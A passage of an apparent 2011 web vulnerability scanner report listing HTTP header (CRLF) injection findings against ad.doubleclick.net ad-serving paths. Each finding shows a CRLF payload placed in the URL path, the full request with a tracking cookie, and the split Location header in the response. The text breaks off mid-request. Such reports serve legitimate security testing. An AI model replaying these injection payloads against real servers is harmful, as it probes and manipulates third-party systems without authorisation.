Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/18c9f
0be64f77a4b
/interactive.wsj.com/markets_intelligentinvestor;u=;!category=;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=1;sz=377x50;ord=8027802780278027;:
Date: Mon, 14 Feb 2011 01:36:58 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.15. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 676f7%0d%0a0fa438a5db8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /676f7%0d%0a0fa438a5db8/interactive.wsj.com/personalfinance_newsreel;u=;!category=;;mc=b2pfreezone;tile=1;sz=2x94;ord=3623362336233623; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/676f7
0fa438a5db8
/interactive.wsj.com/personalfinance_newsreel;u=;!category=;;mc=b2pfreezone;tile=1;sz=2x94;ord=3623362336233623;:
Date: Mon, 14 Feb 2011 01:37:05 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.16. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3340.trfu/B4677841.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8da73%0d%0ae56ac07066f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8da73%0d%0ae56ac07066f/N3340.trfu/B4677841.11;sz=160x600;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aMmMBkod6OXq2x2HUHQcrF563KmtIoVWbdYFrk1Fji0qqnSUnAUbYYTt3UnUjmPUrqYqrp4EJg5af4oTrH1rffUHfVoAnBnGYvpWfE5TQ73dem3A7KnF3ZdXsfRYVJ31V7Nmq745FYRVrBZbVmnYQEvQSbQGyl1SGq/;ord=1074505797? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8da73
e56ac07066f
/N3340.trfu/B4677841.11;sz=160x600;pc=[TPAS_ID];click=http: //a.tribalfusion.com/h.click/aMmMBkod6OXq2x2HUHQcrF563KmtIoVWbdYFrk1Fji0qqnSUnAUbYYTt3UnUjmPUrqYqrp4EJg5af4oTrH1rffUHfVoAnBnGYvpWfE5TQ73dem3A7KnF3ZdXsfRYVJ31V7Nmq745FYRVrBZbVmnYQEvQSbQGyl1SGq/;ord=1074505797
Date: Mon, 14 Feb 2011 02:10:44 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.17. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.16 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3340.trfu/B4677841.16

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 353a8%0d%0a75a8fe84543 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /353a8%0d%0a75a8fe84543/N3340.trfu/B4677841.16;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aDmMBkUArTPEQYQGMsQWUy0djrTmQM4srYYrQDV6Xr4AZbaQPFH2dUrXWUCmH6v56BS5GbeTcn9Wc7gPPZbMWdv3Urf45b6uWqUwWEJ8SE3FSGJZaRr6rRtYdWcbW4rimntimYTmp4tvBQsFZd5AYKpdEyVTZbPyhCana/;ord=1099355303? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/353a8
75a8fe84543
/N3340.trfu/B4677841.16;sz=728x90;pc=[TPAS_ID];click=http: //a.tribalfusion.com/h.click/aDmMBkUArTPEQYQGMsQWUy0djrTmQM4srYYrQDV6Xr4AZbaQPFH2dUrXWUCmH6v56BS5GbeTcn9Wc7gPPZbMWdv3Urf45b6uWqUwWEJ8SE3FSGJZaRr6rRtYdWcbW4rimntimYTmp4tvBQsFZd5AYKpdEyVTZbPyhCana/;ord=1099355303
Date: Mon, 14 Feb 2011 02:49:58 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.18. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3340.trfu/B4677841.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7a3a9%0d%0ae709d62e175 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7a3a9%0d%0ae709d62e175/N3340.trfu/B4677841.2;sz=160x600;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aHmMBkRU7NYEnq5qbi4E71nEfF1bFdWHJTn6rBpVUroWfF2qri3Heq3AjEmUYZdXGfPYVJT1sBopEn35UZbSTFZbZcWAr0RErQQcrNPdUuYdbuVmMM4sYYXbrITAio46B9QmbF3tUOXH3ZcnWin4PQT4sngVbUVtZbrHGd/;ord=1089458998? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7a3a9
e709d62e175
/N3340.trfu/B4677841.2;sz=160x600;pc=[TPAS_ID];click=http: //a.tribalfusion.com/h.click/aHmMBkRU7NYEnq5qbi4E71nEfF1bFdWHJTn6rBpVUroWfF2qri3Heq3AjEmUYZdXGfPYVJT1sBopEn35UZbSTFZbZcWAr0RErQQcrNPdUuYdbuVmMM4sYYXbrITAio46B9QmbF3tUOXH3ZcnWin4PQT4sngVbUVtZbrHGd/;ord=1089458998
Date: Mon, 14 Feb 2011 02:34:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.19. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.38 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3340.trfu/B4677841.38

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 41285%0d%0a1e6e4985043 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /41285%0d%0a1e6e4985043/N3340.trfu/B4677841.38;sz=160x600;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aGmMBkREnQQcvrQWbM1WvnWmnN4cQ10UvZdUPmw2AvdPmMG3dro0dYKpdIm4AMR5sj6TVBbVVjkR6YvWdZbRWrBP3bIsUqQvVTniPEBIQGZbCPb6tPHv6Wc3T4r6pmWuqYamy3HMZdSVfC4AvEpWInUWZbh0crUOW2jJt/;ord=1093437000? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/41285
1e6e4985043
/N3340.trfu/B4677841.38;sz=160x600;pc=[TPAS_ID];click=http: //a.tribalfusion.com/h.click/aGmMBkREnQQcvrQWbM1WvnWmnN4cQ10UvZdUPmw2AvdPmMG3dro0dYKpdIm4AMR5sj6TVBbVVjkR6YvWdZbRWrBP3bIsUqQvVTniPEBIQGZbCPb6tPHv6Wc3T4r6pmWuqYamy3HMZdSVfC4AvEpWInUWZbh0crUOW2jJt/;ord=1093437000
Date: Mon, 14 Feb 2011 02:40:56 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.20. http://ad.doubleclick.net/adj/N4233.RSI/B4932906.5 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4233.RSI/B4932906.5

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2b8f1%0d%0a4fde4d2ea46 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2b8f1%0d%0a4fde4d2ea46/N4233.RSI/B4932906.5;sz=728x90;pc=[TPAS_ID];click0=http://ad.yieldmanager.com/clk?2,13%3B347c1d6bae030f8b%3B12e21cf7f71,0%3B%3B%3B2909974716,tgEAALdCCQAMv2oAAAAAACJcHgAAAAAAAgAAAAYAAAAAAP8AAAABFJxwDgAAAAAAUgYoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAopAQAAAAAAAIAAgAAAAAAZH.PIS4BAAAAAAAAAGNjZTE4Yzc2LTM3ZGEtMTFlMC05MDYyLTAwMzA0OGQ0NDg0MABwAAAAAAA=,,http%3A%2F%2Fblogs.desmoinesregister.com%2Fdmr%2Findex.php%2F2011%2F02%2F11%2Fdaniels-at-cpac-calls-for-broad-civil-conservative-coalition%2F,;ord=1297647370? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2b8f1
4fde4d2ea46
/N4233.RSI/B4932906.5;sz=728x90;pc=[TPAS_ID];click0=http: //ad.yieldmanager.com/clk
Date: Mon, 14 Feb 2011 01:38:16 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.21. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4dc34%0d%0aa5e50b6234 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4dc34%0d%0aa5e50b6234/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4dc34
a5e50b6234
/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http: //media.fastclick.net/w/click.here
Date: Mon, 14 Feb 2011 01:44:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.22. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.19 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.aol1/B5070033.19

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 21598%0d%0adfea6d161cc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /21598%0d%0adfea6d161cc/N5506.aol1/B5070033.19;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000790494/mnum=0000961998/cstr=21356372=_4d5883e9,4634560753,790494%5E961998%5E65%5E0,1_/xsxdata=$xsxdata/bnum=21356372/optn=64?trg=;ord=4634560753? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/21598
dfea6d161cc
/N5506.aol1/B5070033.19;sz=300x250;click=http: //r1-ads.ace.advertising.com/click/site=0000790494/mnum=0000961998/cstr=21356372=_4d5883e9,4634560753,790494^961998^65^0,1_/xsxdata=$xsxdata/bnum=21356372/optn=64
Date: Mon, 14 Feb 2011 01:26:53 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.23. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.20 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.aol1/B5070033.20

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6f51e%0d%0a50897e369b1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6f51e%0d%0a50897e369b1/N5506.aol1/B5070033.20;sz=468x60;click=http://r1-ads.ace.advertising.com/click/site=0000784416/mnum=0000955496/cstr=16922248=_4d5886f4,5663037085,784416%5E955496%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=16922248/optn=64?trg=;ord=5663037085? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6f51e
50897e369b1
/N5506.aol1/B5070033.20;sz=468x60;click=http: //r1-ads.ace.advertising.com/click/site=0000784416/mnum=0000955496/cstr=16922248=_4d5886f4,5663037085,784416^955496^1183^0,1_/xsxdata=$xsxdata/bnum=16922248/optn=64
Date: Mon, 14 Feb 2011 01:37:19 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.24. http://ad.doubleclick.net/adj/N5506.aol1/B5070033.21 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.aol1/B5070033.21

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4200e%0d%0a6f9caf0b583 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4200e%0d%0a6f9caf0b583/N5506.aol1/B5070033.21;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000790492/mnum=0000955494/cstr=2727762=_4d588747,6836118676,790492%5E955494%5E65%5E0,1_/xsxdata=$xsxdata/bnum=2727762/optn=64?trg=;ord=6836118676? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4200e
6f9caf0b583
/N5506.aol1/B5070033.21;sz=160x600;click=http: //r1-ads.ace.advertising.com/click/site=0000790492/mnum=0000955494/cstr=2727762=_4d588747,6836118676,790492^955494^65^0,1_/xsxdata=$xsxdata/bnum=2727762/optn=64
Date: Mon, 14 Feb 2011 01:40:28 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.25. http://ad.doubleclick.net/adj/N5798.133090.8212946998421/B3792881.193 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5798.133090.8212946998421/B3792881.193

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3d0ee%0d%0a9315563214f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3d0ee%0d%0a9315563214f/N5798.133090.8212946998421/B3792881.193;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=60387657634239681&mt_id=102306&mt_adid=53&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60387657634239681? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3d0ee
9315563214f
/N5798.133090.8212946998421/B3792881.193;sz=300x250;click1=http: //pixel.mathtag.com/click/img
Date: Mon, 14 Feb 2011 02:14:33 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.26. http://ad.doubleclick.net/adj/N6046.134363.2043285697521/B5118749.2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6046.134363.2043285697521/B5118749.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 69142%0d%0a1bb7359b8ec was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /69142%0d%0a1bb7359b8ec/N6046.134363.2043285697521/B5118749.2;sz=180x150;click=http://r1-ads.ace.advertising.com/click/site=0000786606/mnum=0000947584/cstr=80089922=_4d588ace,5635760168,786606%5E947584%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=80089922/optn=64?trg=;ord=5635760168? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/69142
1bb7359b8ec
/N6046.134363.2043285697521/B5118749.2;sz=180x150;click=http: //r1-ads.ace.advertising.com/click/site=0000786606/mnum=0000947584/cstr=80089922=_4d588ace,5635760168,786606^947584^1183^0,1_/xsxdata=$xsxdata/bnum=80089922/optn=64
Date: Mon, 14 Feb 2011 01:52:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.27. http://ad.doubleclick.net/adj/N6092.AOL/B5108587.3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6092.AOL/B5108587.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9b799%0d%0abb53a367fe4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9b799%0d%0abb53a367fe4/N6092.AOL/B5108587.3;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000717505/mnum=0000969227/cstr=23267000=_4d588750,4637776738,717505%5E969227%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=23267000/optn=64?trg=;ord=4637776738? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9b799
bb53a367fe4
/N6092.AOL/B5108587.3;sz=300x250;click=http: //r1-ads.ace.advertising.com/click/site=0000717505/mnum=0000969227/cstr=23267000=_4d588750,4637776738,717505^969227^1183^0,1_/xsxdata=$xsxdata/bnum=23267000/optn=64
Date: Mon, 14 Feb 2011 01:41:22 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.28. http://ad.doubleclick.net/adj/cm.drudgerep/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.drudgerep/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8e2dd%0d%0aaa7cb3ecbf6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8e2dd%0d%0aaa7cb3ecbf6/cm.drudgerep/;net=cm;u=,cm-47449671_1297649419,11d765b6a10b1b3,polit,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.rdst11-cm.rdst12-cm.polit_h-cm.health_h-cm.music_h-cm.sports_h-cm.weath_l-cm.shop_h-cm.tech_h-cm.ent_h-bk.rdst1-mm.aa5-mm.ad1-mm.af1-mm.ag1-mm.ai1-mm.al5-mm.am5-mm.ar1-mm.as1-mm.au1-mm.da1-an.51-an.5-ex.32-ex.76-ex.49-dx.16-qc.a;;cmw=owl;sz=300x250;net=cm;ord1=789918;contx=polit;an=300;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.rdst11;btg=cm.rdst12;btg=cm.polit_h;btg=cm.health_h;btg=cm.music_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.shop_h;btg=cm.tech_h;btg=cm.ent_h;btg=bk.rdst1;btg=mm.aa5;btg=mm.ad1;btg=mm.af1;btg=mm.ag1;btg=mm.ai1;btg=mm.al5;btg=mm.am5;btg=mm.ar1;btg=mm.as1;btg=mm.au1;btg=mm.da1;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=ex.49;btg=dx